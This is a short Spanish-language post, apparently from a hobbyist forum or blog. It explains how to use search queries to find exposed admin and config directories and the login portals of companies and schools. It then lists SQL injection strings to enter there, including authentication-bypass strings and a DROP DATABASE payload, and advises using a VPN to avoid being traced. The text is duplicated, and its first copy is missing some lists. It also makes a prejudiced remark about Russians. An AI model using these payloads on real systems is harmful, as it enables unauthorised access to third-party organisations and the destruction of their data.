Post rápido sobre esto. Hace tiempo estube en un webinar de hacking ético, y al parecer no era tan ético, jaja.
Te metes a google o cualquier navegador y buscas lo siguiente:
Es flipante como hay páginas web con estos fallos garrafales. Si es una pàgina web rusa o que esta en ruso, no es metais, nunca os fieis de un ruso en estos temas (experiencia propia).
Si en algunas quereis hacer alguna SQL Injection. Buscais en Google o el buscador que más os guste:
Te saldran muchas portales de inicio de sesion de empresesas, colegios, etc. A continuación te dejo "lineas", para hacer SQL Injections:
Para el usuario siempre va bien usar:
- admin
- root
-administrador
Para la contraseña:
- 'union select @@datadir #
- admin' or '1'='1 (este la mayoria de veces me funciona)
- admin'--
- ':SELECT * FROM users WHERE name NOT '
- Pass= '' OR '1'='1') DROP DATABASE (cuidado con usar esta, podrias llegar a borrarle la base de datos, i se va todo a tomar polculo).
Solo deciros que con paginas web de mierda, en la URL añades una ' y ya peta o te devuelve información sobre la Database, que es muy malo que una pagina web responda así ya que te da signos de que es vulnerable.
PORFAVOR. Si lo haceis, al menos en una màquina virtual, si puede ser con una VPN.
Te metes a google o cualquier navegador y buscas lo siguiente:
- index of /admin
- index of /config
- index of ws_ftp.log
Es flipante como hay páginas web con estos fallos garrafales. Si es una pàgina web rusa o que esta en ruso, no es metais, nunca os fieis de un ruso en estos temas (experiencia propia).
Si en algunas quereis hacer alguna SQL Injection. Buscais en Google o el buscador que más os guste:
- login | logon intranet.
Te saldran muchas portales de inicio de sesion de empresesas, colegios, etc. A continuación te dejo "lineas", para hacer SQL Injections:
Para el usuario siempre va bien usar:
- admin
- root
-administrador
Para la contraseña:
- 'union select @@datadir #
- admin' or '1'='1 (este la mayoria de veces me funciona)
- admin'--
- ':SELECT * FROM users WHERE name NOT '
- Pass= '' OR '1'='1') DROP DATABASE (cuidado con usar esta, podrias llegar a borrarle la base de datos, i se va todo a tomar polculo).
Solo deciros que con paginas web de mierda, en la URL añades una ' y ya peta o te devuelve información sobre la Database, que es muy malo que una pagina web responda así ya que te da signos de que es vulnerable.
PORFAVOR. Si lo haceis, al menos en una màquina virtual, si puede ser con una VPN.